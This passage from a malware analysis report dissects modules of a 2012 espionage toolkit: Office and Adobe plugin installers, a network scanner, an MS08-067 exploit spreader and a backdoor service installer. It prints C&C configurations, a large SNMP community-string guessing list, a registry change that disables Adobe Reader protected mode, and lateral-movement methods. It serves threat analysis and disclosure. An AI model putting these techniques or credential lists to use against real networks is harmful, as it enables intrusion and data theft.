If the operation mode byte is equal to 3, the module loads the decrypted payload as a PE DLL library using own PE formatloader, and executes its DllMain function. If the operation mode byte contains any other value, it tries to write the payload tothe first available directory from the list:
%windir%\Temp\%TMP%\%TEMP%\%ProgramFiles%\Common Files\%ProgramFiles%\WindowsUpdate\
The name of the file is read from the beginning of the decrypted payload.
Then, the module selects further actions depending on the operation mode byte:
Operation mode byte value Action
1 Execute the file with CreateProcess
2 Load the file with LoadLibrary
OfficeBDInstaller module (Microsoft Office plugin installer)Known variants:
MD5 Compilation date (payload)
AE693C43E40F0DE9DE9FA2D950003ABF 2012.10.09 06:42:11 (GMT)
The file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. All the functionality isimplemented in the DllMain function.
DllMainWhen loaded, the module retrieves its resource of type "BBB" and name "AAA", and starts an internal plugin framework. Themain function of the module is named "task_msplugin" and is registered in the framework. Then, it starts the framework mainloop, effectively parsing the resource data and executing the list of actions encoded in the resource.
The decoded resource data for the known sample can be represented as the following script:
SetOption(conn_a.VERSION_ID, [6] "51070")SetOption(conn_a.VER_SESSION_ID, %removed%)SetOption(conn_a.SEND_DELAY_TIME, [5] "2000")SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.D_MODE, "3")SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")SetOption(conn_a.D_PASS, 0x00)SetOption(conn_a.D_RPRT, [3] "80")SetOption(conn_a.D_SPRT, [3] "80")SetOption(conn_a.D_USER, [21] %removed%)SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.J_MODE, 0x0033)SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")SetOption(conn_a.J_PASS, 0x00)SetOption(conn_a.J_RPRT, [3] "80")SetOption(conn_a.J_SPRT, [3] "80")SetOption(conn_a.J_USER, [21] %removed%)SetOption(msplugin_loc, 76288 bytes buffer)SetOption(msplugin_name, 28 bytes buffer)SetOption(msplugin_Word, "1")SetOption(msplugin_Excel, "0")SetOption(msplugin_PowerPoint, "0")SetOption(msplugin_desc0, 38 bytes buffer)SetOption(msplugin_desc1, 58 bytes buffer)SetOption(msplugin_desc2, 64 bytes buffer)SetOption(msplugin_progid, 22 bytes buffer)Call(task_msplugin)
Main function (task_msplugin)First, the module tries to raise its privileges. It tries to log in as a privileged user using a dictionary of common passwords.Then, it tries to locate installed Microsoft Office application by enumerating the registry keys inHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall and searching for the keys that contain "Microsoft Office","Microsoft Office Word", "Microsoft Office Shared" in the "DisplayName" value. If no key was found, the module abortsinstallation.
Then, depending on the values of the options "msplugin_Word", "msplugin_Excel", "msplugin_PowerPoint", it installs a pluginfor selected Office applications. For each application, it tries to write the plugin to the first available directory from the list:
%ProgramFiles%\Microsoft Office\Office10\Data\%ProgramFiles%\Microsoft Office\Office10\%ProgramFiles%\Microsoft Office\Office11\Data\%ProgramFiles%\Microsoft Office\Office11\%ProgramFiles%\Microsoft Office\Office12\Data\%ProgramFiles%\Microsoft Office\Office12\%ALLUSERSPROFILE%\Application Data\Microsoft\Office\%ALLUSERSPROFILE%\Application Data\Microsoft\Office\Data\%APPDATA%\Microsoft\Office\Data\%APPDATA%\Microsoft\Office\%APPDATA%\Microsoft\Windows\%ProgramFiles%\Microsoft Common\%ProgramFiles%\Common Files\
The file name for the plugin is retrieved from the "msplugin_name" option from the resource. It also generates a randomCLSID value for the plugin.
If the file was created without errors, the module creates the following registry values:
HKLM\SOFTWARE\Microsoft\Office\%product name%\Addins\%msplugin_progid option value%\LoadBehavior=DWORD:0x10CommandLineSafe=DWORD:0x00FriendlyName=%msplugin_desc1 option value%Description=%msplugin_desc2 option value%
HKCR\CLSID\%plugin's CLSID%\default=%msplugin_desc0 option value%
HKCR\CLSID\%plugin's CLSID%\InProcServer32\default=%plugin installation path%
HKCR\CLSID\%plugin's CLSID%\ProgID\default=%msplugin_progid option value%
HKCR\CLSID\%plugin's CLSID%\VersionIndependentProgID\default=%msplugin_progid option value%
HKCR\%msplugin_progid option value%\CLSID\default=%plugin's CLSID%
After completing the installation, the module sends its log file to the C&C server. The connection options are retrieved fromthe configuration (resource):
Option name Description
D_CONN List of C&C domain names, separated by ';'
D_RPRT C&C server port
D_NAME Relative URL to send request to
The data send to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it isBase64-encoded.
AdobeBDInstaller module (Adobe Reader plugin installer)Known variants:
MD5 Compilation date (payload)
09fd8e1f2936a97df477a5e8552fe360 2012.10.05 11:20:40 (GMT)
The file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. All the functionality isimplemented in the DllMain function.
DllMain functionWhen loaded, the module retrieves its resource of type "BBB" and name "AAA", and starts an internal plugin framework. Themain function of the module is named "task_arplugin" and is registered in the framework. Then, it starts the framework mainloop, effectively parsing the resource data and executing the list of actions encoded in the resource.
The decoded resource data for the known sample can be represented as the following script:
SetOption(conn_a.VERSION_ID, [6] "51070")SetOption(conn_a.VER_SESSION_ID, %removed%)SetOption(conn_a.SEND_DELAY_TIME, [5] "2000")SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.D_MODE, 0x0033)SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")SetOption(conn_a.D_PASS, 0x00)SetOption(conn_a.D_RPRT, [3] "80")SetOption(conn_a.D_SPRT, [3] "80")SetOption(conn_a.D_USER, [21] %removed% )SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.J_MODE, 0x0033)SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")SetOption(conn_a.J_PASS, 0x00)SetOption(conn_a.J_RPRT, [3] "80")SetOption(conn_a.J_SPRT, [3] "80")SetOption(conn_a.J_USER, [21] %removed% )SetOption(arplugin_loc, 76288 bytes buffer )SetOption(arplugin_name, 28 bytes buffer )Call(task_arplugin)
Main function (task_arplugin)The module retrieves the Adobe Reader installation path by reading the registry value:
HKLM\SOFTWARE\Classes\Software\Adobe\Acrobat\Exe\@default
Then, it tries to identify the version of installed software by searching for strings "10.0\", "9.0\", "8.0\" in the installation path. Ifnone of them are found, it aborts installation with error.
If installation path contains the string "10.0\", the module tries to open the existing registry key:
HKCU\SOFTWARE\Adobe\Acrobat Reader\10.0
If the key exists, then writes "Privileged='ON'" into its log and sets the following registry key, effectively disabling the"protected mode" of the Adobe Reader:
HKCU\SOFTWARE\Adobe\Acrobat Reader\10.0\Privileged\bProtectedMode=0
Then, the module extracts the Acrobat Reader plugin body from the configuration option "arplugin_loc" (specified in theresource) and writes it to:
%acrobat reader installation path%\plug_ins\%arplugin_rem option value%
It also retrieves the last write time of the plug_ins directory and sets the plugin's last write time to the same value.
After completing the installation, the module sends its log file to the C&C server. The connection options are retrieved fromthe configuration (resource):
Option name Description
D_CONN List of C&C domain names, separated by ';'
D_RPRT C&C server port
D_NAME Relative URL to send request to
The data send to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it isBase64-encoded.
8. Spreading groupFileputexec moduleKnown variants:
MD5 Compilation date (payload)
6FE7EB4E59448E197BDFAE87247F3AE6 2012.09.06 07:55:31 (GMT)
ED5FF814B10ED25946623A7EC2C0A682 2012.09.06 07:55:31 (GMT)
37B443893551C1537D00FD247E3C9A78 2012.09.06 07:55:31 (GMT)
SummaryThe file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. Known samples share onecode section, but contain different payloads in the resource section. All the functionality is implemented in the DllMainfunction. It writes files from its configuration resource to disk and starts a new process from these file(s).
DllMainWhen loaded, the module retrieves its resource of type "BBB" and name "AAA", and starts an internal plugin framework. Themain function of the module is named "task_fileputexec" and is registered in the framework. Then, it starts the frameworkmain loop, effectively parsing the resource data and executing the list of actions encoded in the resource.
Decoded resource data for the module can be represented as the following script:
SetOption(conn_a.VERSION_ID, [6] "51070")SetOption(conn_a.VER_SESSION_ID, %removed%)SetOption(conn_a.SEND_DELAY_TIME, [5] "2000")
SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.D_MODE, 0x0033)SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")SetOption(conn_a.D_PASS, 0x00)SetOption(conn_a.D_RPRT, [3] "80")SetOption(conn_a.D_SPRT, [3] "80")SetOption(conn_a.D_USER, [21] %removed%)SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.J_MODE, 0x0033)SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")SetOption(conn_a.J_PASS, 0x00)SetOption(conn_a.J_RPRT, [3] "80")SetOption(conn_a.J_SPRT, [3] "80")SetOption(conn_a.J_USER, [21] %removed%)SetOption(file_loc)SetOption(file_rem)SetOption(file_exec_rem)SetOption(file_loc, 156898 bytes buffer )SetOption(file_rem, 100 bytes buffer )Call(task_fileputexec)
Main function (task_fileputexec)The module implements two distinct functions:
It writes files from its configuration resource to diskIt starts executable files specified in the resource
First, the module looks for pairs of configuration options called "file_rem" and "file_loc". The module iterates through all"file_rem" options, reads the corresponding "file_loc" value and writes the contents of the latter option to disk, using the valueof "file_rem" as a filename.
The "file_rem" value can specify a location at another computer's network share. In this case the module tries to log onto thatshare using credentials specified in an encrypted configuration file that may be located at:
%ALLUSERSPROFILE%\adt.dat %LOCALAPPDATA%\adt.dat
Known variants of the module were used to write another module called "scheduler" and additional files for this module.
After processing all "file_rem" and "file_loc" options, the module iterates through all values of the "file_exec_rem" option.Each value is expected to be an applications path, and each application is executed using the CreateProcess API function.
After processing all the configuration options, the module sends its log file to the C&C server. The connection options areretrieved from the configuration (resource):
Option name Description
D_CONN List of C&C domain names, separated by ';'
D_RPRT C&C server port
D_NAME Relative URL to send request to
The data sent to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it isBase64-encoded.
Netscan module
Known variants:
MD5 Compilation date
06ebdde6a600a65e9e65ba7c63f139fa 2012.09.05 07:02:28 (GMT)
b49232652748ab677a944bd4d4650603 2012.09.05 07:02:28 (GMT)
SummaryThe file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. All the functionality isimplemented in the DllMain function.
Once it is loaded it was designed to start scanning other hosts in the network and record responses. It would do severalprobes for remote vulnerabilities, such as MS08-067. It is capable of dumping current configuration of Cisco routers if theyare available via SNMP and the scanner successfully guessed the SNMP community name.
This module loads a config from local resource AAA and executes a network scanning task.
Loading procedureDue a design made by the developer usage of this module is limited. It seems that it was developed and tested as an EXEfile, however in the release version it was compiled as a DLL. This change was extremely significant for the wholefunctionality which creates a number of worker threads right in the main function, which is would be fine for EXE moduleWinMain function, but is restrcited for library DllMain function. This broke down the module as it created threads whichcouldn't run when DLL is loaded via LoadLibrary API. However, it's important to note that the developers implemented ownPE loader, which doesn't have such limitation as Window native PE loader, and which is why it can still be used as acomponent of malicious kit.
DllMain functionCurrent sample has the following embedded config:
SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")SetOption(conn_a.D_RPRT, [3] "80")SetOption(conn_a.D_SPRT, [3] "80")SetOption(conn_a.D_USER, [21] "%removed%")SetOption(conn_a.D_MODE, 0x0033)SetOption(conn_a.D_PASS, 0x00)SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")SetOption(conn_a.J_USER, [21] "%removed%")SetOption(conn_a.J_RPRT, [3] "80")SetOption(conn_a.J_SPRT, [3] "80")SetOption(conn_a.J_MODE, 0x0033)SetOption(conn_a.J_PASS, 0x00)SetOption(conn_a.VERSION_ID, [6] "51070")SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")SetOption(conn_a.VER_SESSION_ID, [11] "%removed%")SetOption(NET, [26] "127.0.0.1 255.255.255.255")SetOption(netscan_get_NET, "1")SetOption(netscan_get_net_ad, "1")SetOption(netscan_get_net_msnet, "1")SetOption(netscan_get_net_msdom, "1")SetOption(netscan_threads_num, [3] "64")
SetOption(netscan_tcpscanwinsrv, "1")SetOption(netscan_tcpscanwin, "0")SetOption(netscan_tcpscannotwin, "0")Call(task_netscan)
The target networks to scan are selected automatically and include the following lists:
1. specified in the config NET variable if netscan_get_NET is set to 12. subnets of IPs which are visible from adapters config via GetAdaptersInfo API (current IP, gateway, DHCP, WINS
servers)3. subnets of IPs which are visible in the list of currently mapped shared folders4. subnets of IPs which are part of current Microsoft Windows domain as reported by the Domain Controller
Scanning procedureThe scan begins with pinging the target with 2 seconds timeout. Then the scanner gets target hostname and MAC address.After that it tries to send an SNMPv3 request. Unlike SNMPv2, SNMPv3 responds even if the username is wrong allowingyou to identify if the port is open or not. If the remote SNMP agent responds, then the scanner will try to talk further.
SNMP packet from malware in Wireshark
It tries to guess the SNMP agent community name from a list of 600 hardcoded variants. The list itself interesting enough asit seems to be made of previously discovered SNMP agent community names from various locations where the attackersmanaged to penetrate networks.
We are sharing the list, maybe it will help someone identify his SNMP community name and will cause further networkchecks:
public Petrofac henrygiz publio
private Private hp_admin publis
1q2w3e Ptbnic i6666 publiw
1q2w3e4r Ptcmic icces publkB
1q2w3e4r5t PuBMic ilmi publkc
1q2w3e4r5t6y Public intelligence publmc
cscAstral RM24655521 intermec publoc
@5tr0Mon1 RcFnsSnCo20m08R internal publxc
1qazxsw23edc RnfE36mM ipko publyc
3edcxzaq12 RoaringKat ipxint publ{C
123ewqasdcxz SECRET itorocmn publ{c
!@#ewqASDcxz SECURITY jessica pubmi?
!QAZxcde32 SINetMGT jg214327 pubmia
qsczse SNMP jimaguas pubmic
234rfvcxsw SNMP_trap jozefina pubn
$3eTn27W#7 SPBranc1d-Rw jpiworldwide pubn)c
10101 SWITCH karZer pubni?
3101974 SYSTEM kazeem pubni?"
0392a0 SbcihAiryq52 kbiway2007 pubnib
41309 Secret kbiway2008 pubnic
6051983 Security kerrek pubpc1
80808 Si4m2010AyZnFkDe45L kittec pucliC
0ublic Slay1987 kokale puclic
1021947 Soco kokale1980 puclic?
1100293 Sr.h3Q6i koko puclik
112511polo Switch konsulro pucmic
1212x System korablik pufl
123123321 TENmanUFactOryPOWER korona puflic
1234 TEST krakoziabra pufli{
123456 TRD_VSAT kuwait pufmyc
12345678 W1ld#Parr0ts kyw.u61 puglic
1,23457E+17 YDFWgSKh lapublic pujlic
1,23457E+17 YXaLmb1t5Ras laura pur-i?
123o321 YsZpL5RqMa76 lebanon pur??1
126ajm19kal51ma Z123456z lfcadoot purlic
130601 Zxcvbnm123 lhlyy0320 purlig
1,32413E+15 `ublic linda pusac
13244231 a1b2c3d4 louvain pwbli#
13971852654 absurdistan_81 loveme pwblic
162534 access macedonia pwjlic
17081- adimn makbank23 p}1??1
170810 admin manager qazwsx
1809BGD11 admin1 manuel qazxcdew
1940117 adonis mariam qubl?3
1947102 agent marius qwedcxza
19841990 agent_steal martin qwer1234
199397 ajutorsoci mary1964 qwerty
19M1R20S akjol1230 meerim0909 qwerty123456
1Q5IRJmg9Q alfa239 merlin62 qwertyu
1q2w3e alfa2390 mesurucu qwertyui
1q2w3e4r alfred metiha r0snmp$tr1ng
1q2w3e4r5t all private mfa123MFA r23771
1q2w3e4r5t6y all public mfa6789 rainbow
1qazxsw23edc alpha mfalOVAL rbnpublic
2005 amBa3#wsx mimoza rccm-map
21012008a amsterdam2003 mirella read
212321a andrey240787 mirella26091978 read-only
24021985 antoniu mitrkq1w2e3 read-write
240787 arbor mmat1230 readonly
2531821 assistant2007 mmat1987 readwrite
280d1a03 astalavista mngt regional
285468339 at.prague mofa rekzi
29091972 at@szat mohammed richka
2read aublic moni4man rm5tbd23
31sal999 auok12 monitor rmon
378dd6 avsvMda monitoring rmon_admin
3DB5ZG baborasa1234 mq5Kg9iG ro4orion
3MC-Zuku-Rw backb00r mrtg ro81qnp4
43827207V backupauto ms03101974 roembil
4changes badarsul msnadm romania2
4udoju badarsul86 mudrost999 root
549yotok bandwidth nasasiet router
553322 bar789 nasawr1 rusinfonet
5bpbpyHeLu0a9Ab bathclnet nature rw4orion
5zzkzp batru_ro netman rwcfcmp1s
626fqs benj2023 netman2002 s3cr3t
63Fd6dYhMnsjMNPk benjaminfranklin network sabonis
654321 bintec nina180754 safara
6551318 blue none salvaje07
693ygUgv boksha noppes san-fran
722690 br0adwhy norformin sanfran
7777777inchinas bratan notprivate sayyara
789456 breakpoint notpublic scotty
7917407 bumblebee notpulic seCtion%
794613 bunnia2010 nr.490315 seait
7nsi20 c20176 ntnhflm secret
7p1cCcZvqY6T cable-d nurtenbay security
80244 cable-docsis nvaiaJC4 sel1
816836 canon_admin okoloamaraa seri
83L80N3 ccrthwtd openview sirti
8491 cde32wsxzaq1 oyeneye sitalan
8591 chelyabinsk p0l!@#nms skl1971
8888888 chera98888 p3j4nt4n slamat
8ublic chiaro p5blic snmc-read
8urlib chumburidze p9EGn25D snmp
<removed> cisco pUbhic snmpd
AKdGmjQO cisco-adsl parrral snmptrap
ANYCOM clingendael pass solaris
Admin cme_1823 password sonjaGRIESEL7475@31
Afoltz-PB commread pgnred sovam
Allahu community picpu sp3ctr0
Andrey131201 commwrite polaris stanislavl
Bl234353 control polmrtg stopsign
C0de corba polsnmp superuser
C0mmunity[hezt00a1 core porneste switch
C0mmunity[hezt00a2 correyvba post system
C0mmunity[hezt00aa3 cp8S52aA pounette t1HAI2nai
C0mmunity[hezt00b1 cpecwr99 power222 talgat
C495y5m6T1 cpecww99 ppb(260685) tasevski1980
CISCO cs1bhS8W pqblic tech
CONSIP_MIB csi-rain pqpq-1957 telecom
CR52401 cucurigu pr1ap1014 temp
D1g!T da123456 pr1v4t3 test
DNOT?ISTLE dasakirov priemnaja test123
DNOTHISTLE debug privat test2
E142BERLINO deeplomat provision tiv0li
EC_IMCO default proxy tivoli
ET0021B7E49CC9 dilbert prtgmail topnet
G1Mme1nf0 diver pu6lik toto29+
GINL-!M3npEFF dk0208 pu?hi? trap
GN0CR3AD dollys pu?l trappss
GSBTBMPLS! drazen024 pu?l)c traps
GWAN_g,2b?l?m0nit0r efimerida pu?l`b udelcakil
GWAN_gl0baL??k?? elchin2491 pu?lib undefined
GWAN_gl0bal_m0gid0r elen24 pu?lic uragan
GWAN_gl0bal_m0nit0? eman72 pu?lik user
GWAN_gl0bal_m0nit0r embassy pu?lyc vakvouk2008
GWAN_gl0bal_mxJ?6?v enable puBlic vanoord-ro
GulNozMeh f6PF3T9T pu`lic vfczyz
HDDBELBXL fabian pub?ic victor
HITMAN fake2011 pubdic vizirenok
ILMI fastanefnd1 pubhic vkananovich
Intermec field publ vpnaccount
Jedeee71 field-service publ)c vt100num
JoJo finance publ1c w03kdpopmail
KBRlog3CPRK forescout publ?3 wallace
L#39YWh7N16w fourthmile publac world
Lcxuidtg freekevin publhc write
Mailbox fubar publi# writeletters
Manyasha fwrocmn publi+ xs159109
Mihnea@109 fwwrcmn publi? xyzzy
NURTENEKREM g0v53vM3 publia yOpZpXjI
NoGaH$@! germanos publib yellow
OrigEquipMfr gestione public!!! z4885645
P@SSW0RD gsoficom14 public1 zafar
PRIVATE gu#3Gst. public2 zskmail
PUBLIC guest public3 zxcvbn
Petr0f`c gulbalam public? zzzzz
Petr0fac gwendal publig
Petr0fac? hello publik
The scanner fetches SNMP agent SysName property and checks if the property is readonly or write-access is available.Then it fetches SNMP SysDescription property.
Interestingly, when the module finds a Cisco snmp agent, it starts own TFTP server and transfers Cisco device configurationvia TFTP.
CISCO configuration dumper function call graph
Next it checks host for SIP service. That is accomplished by sending OPTIONS request to the remote host on port 5060from hardcoded source port 11122:
OPTIONS sip:smap@localhost SIP/2.0Via: SIP/2.0/UDP %Local IP%:11122;branch=z9hG4bK.51125;rport;aliasFrom: ;tag=3a539be23b6269ecTo: sip:IPPhone@localhostCall-ID: 1638708638@%Local IP%CSeq: 3471 OPTIONSContact: <sip:IPPhone@%Local IP%:11122>Content-Length: 0Max-Forwards: 70User-Agent: IPPhone 0.67Accept: text/plain
The module simply saves SIP server response to a log file and goes to the next stage.
Next it tries to work with NetBIOS (SMB) protocol of the remote target, the code includes full own implementation of theprotocol negotiatiation and communication with the remote host. The module establishes SMB NULL session, which doesn'trequire authentication and sends further queries.
The scanning module connects to \\LLSRPC pipe, which is used to be available via SMB NULL session on Windows 2000before SP4. If the attacker connects to Microsoft Windows 2000 Server-based system through a null session, it is possible touse the Llsrpc named pipe to add or to delete licenses, and to create new license groups. However, availability of LLSRPCpipe is checked only to detect the remote OS Service Pack version. There are few other methods in the code that providereliable detection of Service Pack 1,2,3 of Windows 2000.
Next step is to detect remote OS default language. That is accomplished by connecting to Spoolss pipe and querying thename of the service. The response is normally sent in system default language, which is detected by the module. Here is alist of languages, which might indicate which systems attackers are interested in (hardcoded in the malware):
UNKNOWN English Spanish Italian
French German Portuguese - Brazilian Portuguese
Hungarian Finnish Dutch Danish
Swedish Polish Czech Turkish
Japanese Chinese Traditional Chinese Traditional - Taiwan Korean
Russian
So far, the module collects the following information over SMB:
Target NameNetBIOS Domain NameNetBIOS Computer NameDNS Domain NameDNS Computer NameLanguageService PackOS VersionOS Major Version NumberOS Minor Version NumberOS BuildOS Language IDOS Version (alternative detection method)OS Language (alternative detection method)
The module has another unique feature, it checks if the system is vulnerable for MS08-067 vulnerability. It creates a path,part of which includes a unique string "\..\spider3" which we haven't seen previously. The module is capable of constructingtcpbind shellcode for different versions of remote OS to check if the exploit works.
There is a portscanner in the module, and it checks ports from the embedded list:
22, 23, 53, 80, 110, 143, 156, 456, 912, 990, 993, 995, 1043, 1194, 1352, 1433, 2481, 3306, 5432, 8080, 8800
While most of the ports look standard, some of them are not very common. We decided to investigate which services arerunning on those ports.
156 is some SQL Server port, however we don't know any software running on port 156456 is probably a typo of 465 - SMTP over SSL912 is for VMWare Authorization Service990 is used by FTPS995 is for POP3S1043 can be used by BOINC software or Microsoft IIS1194 is a standard port for OpenVPN1352 Lotus Notes/Domino RPC1433 MS SQL Server2481 Oracle Server3306 MySQL Server5432 PostgreSQL8080 HTTP (alternate)8800 HTTP (SunWebAdmin)
If ports 80 or 8080 are open, then the module sends simple HTTP request to test if the remote webserver is available and ifit is running MS Excahnge server. MS Exchange is probed with the following HTTP request:
GET /ews/exchange.asmx HTTP/1.0
Collected information and logs are never saved to a file on disk, instead it is compressed using Zlib compress2 method anduploaded to the server.
MSExploit moduleKnown variants:
MD5 Compilation date
51900a2bb1202225aabc2ee5a64dbe42 2012.06.26 15:11:48 (GMT)
SummaryThe file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010.
All the functionality is implemented in the DllMain function.
This module is used to infect other computers in local area network by using old exploit for vulnerability referred as MS08-067. It checks remote OS version, locale, SP version, crafts a packet with exploit code and pushes to the target. It injects anexecutable payload, which drops another module known as "Frog" (full description of Frog is available in a separate chapter).The later is a backdoor component which provides capability to run arbitrary executable on the remote target.
DllMain functionWhen loaded, the module retrieves its resource of type "BBB" and name "AAA", and starts an internal plugin framework. Themain function of the module is named "task_msexploit" and is registered in the framework. Then, it starts the frameworkmain loop, effectively parsing the resource data and executing the list of actions encoded in the resource.
The decoded resource data for the known sample can be represented as the following script:
SetOption(conn_a.VERSION_ID, [6] "11997")SetOption(conn_a.VER_SESSION_ID, %removed%)SetOption(conn_a.SEND_DELAY_TIME, [5] "2000")SetOption(conn_a.D_CONN, [60] "microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com")SetOption(conn_a.D_MODE, 0x0033)SetOption(conn_a.D_NAME, [18] "/cgi-bin/ms/flush")SetOption(conn_a.D_PASS, 0x00)SetOption(conn_a.D_RPRT, [3] "80")SetOption(conn_a.D_SPRT, [3] "80")SetOption(conn_a.D_USER, [21] "%removed%")SetOption(conn_a.J_CONN, [60] "microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com")SetOption(conn_a.J_MODE, 0x0033)SetOption(conn_a.J_NAME, [18] "/cgi-bin/ms/check")SetOption(conn_a.J_PASS, 0x00)SetOption(conn_a.J_RPRT, [3] "80")SetOption(conn_a.J_SPRT, [3] "80")SetOption(conn_a.J_USER, [21] "%removed%")SetOption(msexploit_loc, 147456 bytes PE file )SetOption(msexploit_ip)SetOption(msexploit_ip, [16] “%Target IP%")Call(task_msexploit)
Main function (task_msexploit)The config defines parameters for the method task_msexploit, which includes the following:
msexploit_loc – a payload to be pushed if exploit worked successfully;msexploit_ip – an array of IPs to attack.
Then the module gets local proxy settings, starting from MS Internet Explorer settings, then parsing Opera profile files (ifexist) and finally getting proxy settings from quite suspicious registry keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrpsHKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrpsHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrpsHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrps
It seems that MapMenuConfigGrps registry value doesn't exist on standard Windows system. We suspect that this registrykey is set by a malicious module during operation and is used to store proxy server parameters.
After that, the module attempts to find %AppData%\adt.dat. Two variants are checked - common and user-specific, i.e.:
C:\Documents and Settings\All Users\Application Data C:\Documents and Settings\username\Application Data
The "adt.dat" file is an encrypted INI-file of known credentials of users in current domain and attacked organization. Whendecrypted this file looks like this:
[user] login = "%User1%"domain = "%Domain%"password = "%Password2%"admin = "1"[user]login = "%User2%"domain = "%Domain%"password = "%Password2%"admin = "1"
This information is checked against local domain controller to find active users with Admin privileges. Verified account isused for optional functionality to establish a NetBIOS connection with remote host to change remote registry. However, theonly setting that is changed is MapMenuConfigGrps value mentioned above. It is set to local parameters of system proxyserver which were acquired before. This is done right after the main attack procedure which uses vulnerability from MS08-067 Security Bulletin.
The MS08-067 attack procedure uses code identical to the code of scanning for vulnerable hosts in Netscan module. Itstarts with pinging the host with ICMP Echo requests and checking host availability. Then it does complex OS fingerprintingusing several different approaches to guess OS version, OS language and Service Pack version. After that it crafts specialpacket and embeds a payload from AAA config (binary parameter named msexploit_loc, see above).
In the end of exploitation process, the module checks availability of the remote host by sending ICMP Echo requests again.
This module doesn't change local registry, nor does it created any local files.
After completing remote attack, the module sends logs to the C&C server. The connection options are retrieved from theconfiguration (resource):
Option name Description
D_CONN List of C&C domain names, separated by ';'
D_RPRT C&C server port
D_NAME Relative URL to send request to
The data send to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it isBase64-encoded.
DASvcInstall moduleKnown variants:
MD5 Compilation date
7ade5d2a88c1eeefe47b501b19c383ef 2012.06.26 15:11:34 (GMT)
SummaryThe file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010.
All the functionality is implemented in the DllMain function. This module is used to infect other computers in local areanetwork by another module known as "Frog" (full description of Frog is available in a separate chapter), which is embeddedin current executable.
The later is a backdoor component which provides capability to run arbitrary executable on the remote target. To infect othercomputers current module uses adt.dat password database file. This contains credentials of administrator accounts. Thecredentials are used to access system administrative share and remotely install the backdoor as a service.
DllMain functionWhen loaded, the module retrieves its resource of type "BBB" and name "AAA", and starts an internal plugin framework. Themain function of the module is named "task_da_svcinstall" and is registered in the framework. Then, it starts the frameworkmain loop, effectively parsing the resource data and executing the list of actions encoded in the resource.
The decoded resource data for the known sample can be represented as the following script:
SetOption(conn_a.VERSION_ID, [6] "11997")SetOption(conn_a.VER_SESSION_ID, %removed%)SetOption(conn_a.SEND_DELAY_TIME, [5] "2000")SetOption(conn_a.D_CONN, [60] "microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com")SetOption(conn_a.D_MODE, 0x0033)SetOption(conn_a.D_NAME, [18] "/cgi-bin/ms/flush")SetOption(conn_a.D_PASS, 0x00)SetOption(conn_a.D_RPRT, [3] "80")SetOption(conn_a.D_SPRT, [3] "80")SetOption(conn_a.D_USER, [21] "%removed%")SetOption(conn_a.J_CONN, [60] "microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com")SetOption(conn_a.J_MODE, 0x0033)SetOption(conn_a.J_NAME, [18] "/cgi-bin/ms/check")SetOption(conn_a.J_PASS, 0x00)SetOption(conn_a.J_RPRT, [3] "80")SetOption(conn_a.J_SPRT, [3] "80")SetOption(conn_a.J_USER, [21] "%removed%")SetOption(da_svc_exe_loc, 103424 bytes of Frog backdoor)SetOption(da_svc_exe_name, "testsvc_00.exe")SetOption(da_svc_name, "testsvc_00_name")SetOption(da_svc_send_proxy, 0x0079)SetOption(da_svc_host)SetOption(da_svc_host, [15] "%Target1_IP%")SetOption(da_svc_host, [14] "%Target2_Hostname%")SetOption(da_svc_host, [16] "%Target3_IP%")
Call(task_da_svcinstall)
Main function (task_da_svcinstall)The config defines parameters for the method task_da_svcinstall, which includes the following:
da_svc_exe_loc – a payload with "Frog" backdoor to be pushed to the remote host;da_svc_exe_name – defines filename that will be used to store the backdoor;da_svc_name – defines service name that will be used to setup the backdoor service;da_svc_send_proxy – if this value is set to 0x79, remote host proxy preferences will be copied from current host to theremote registry;da_svc_host – is a list of target hosts to attack.
Then the module gets local proxy settings, starting from MS Internet Explorer settings, then parsing Opera profile files (ifexist) and finally getting proxy settings from quite suspicious registry keys:
